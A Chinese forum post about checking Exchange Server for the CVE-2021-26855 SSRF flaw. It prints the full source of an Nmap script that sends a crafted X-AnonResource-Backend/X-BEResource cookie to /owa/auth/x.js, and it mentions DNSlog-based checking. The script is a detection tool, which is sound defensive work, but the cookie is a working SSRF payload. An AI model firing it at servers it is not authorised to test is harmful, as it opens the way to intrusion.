搜索
    Hi~登录注册
    查看: 1070|回复: 0
    收起左侧

    CVE-2021-26855 Exchange SSRF DNSlog验证实现方式

    [复制链接]

    66

    主题

    0

    精华

    159 小时

    在线时间

    密圈

    积分
    55
    发表于 2021-3-14 18:00:57 | 显示全部楼层 |阅读模式

    QQ截图20210314175829.png

    QQ截图20210314175938.png

    POC编写也很容易,自己搭建DNSlog平台,使用Py随机序列发送即可。 附带nmap测试脚本 用法nmap -p <port> --script http-vuln-cve2021-26855 <target>

    QQ截图20210314180010.png

    平台不支持nse副本上传,源码如下:

    [code="nse"]
    description = [[
    Detects whether the specified URL is vulnerable to the Exchange Server SSRF Vulnerability (CVE-2021-26855).
    ]]
    
    local http = require "http"
    local shortport = require "shortport"
    local vulns = require "vulns"
    local stdnse = require "stdnse"
    local string = require "string"
    
    ---
    -- @usage
    -- nmap -p &lt;port&gt; --script http-vuln-cve2021-26855 &lt;target&gt;
    --
    -- @output
    -- PORT    STATE SERVICE
    -- 443/tcp  open  https
    -- | http-vuln-cve2021-26855:
    -- |   VULNERABLE
    -- |   Exchange Server SSRF Vulnerability
    -- |     State: VULNERABLE
    -- |     IDs:  CVE:CVE-2021-26855
    -- |
    -- |     Disclosure date: 2021-03-08
    -- |     References:
    -- |       http://aka.ms/exchangevulns
    --
    -- @args http-vuln-cve2021-26855.method The HTTP method for the request. The default method is "GET".
    
    author = "Microsoft"
    license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
    categories = { "vuln" }
    
    portrule = shortport.http
    
    action = function(host, port)
      local vuln = {
        title = "Exchange Server SSRF Vulnerability",
        state = vulns.STATE.NOT_VULN,
        description = [[
    Exchange 2013 Versions &lt; 15.00.1497.012, Exchange 2016 CU18 &lt; 15.01.2106.013, Exchange 2016 CU19 &lt; 15.01.2176.009, Exchange 2019 CU7 &lt; 15.02.0721.013, Exchange 2019 CU8 &lt; 15.02.0792.010 are vulnerable to a SSRF via the X-AnonResource-Backend and X-BEResource cookies.
        ]],
        IDS = {
            CVE = "CVE-2021-26855"
        },
        references = {
            'http://aka.ms/exchangevulns'
        },
        dates = {
            disclosure = { year = '2021', month = '03', day = '08' }
        }
      }
    
      local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
    
      local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "GET"
      local path = "/owa/auth/x.js"
    
      local header = {
        ["Cookie"] = "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;"
      }
    
      local response = http.generic_request(host, port, method, path, { header = header })
      local target = response.header['x-calculatedbetarget']
    
      if response and response.status == 500 and string.match(target,'localhost') then
        vuln.state = vulns.STATE.VULN
      end
    
      return vuln_report:make_output(vuln)
    end
    [/code]
    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表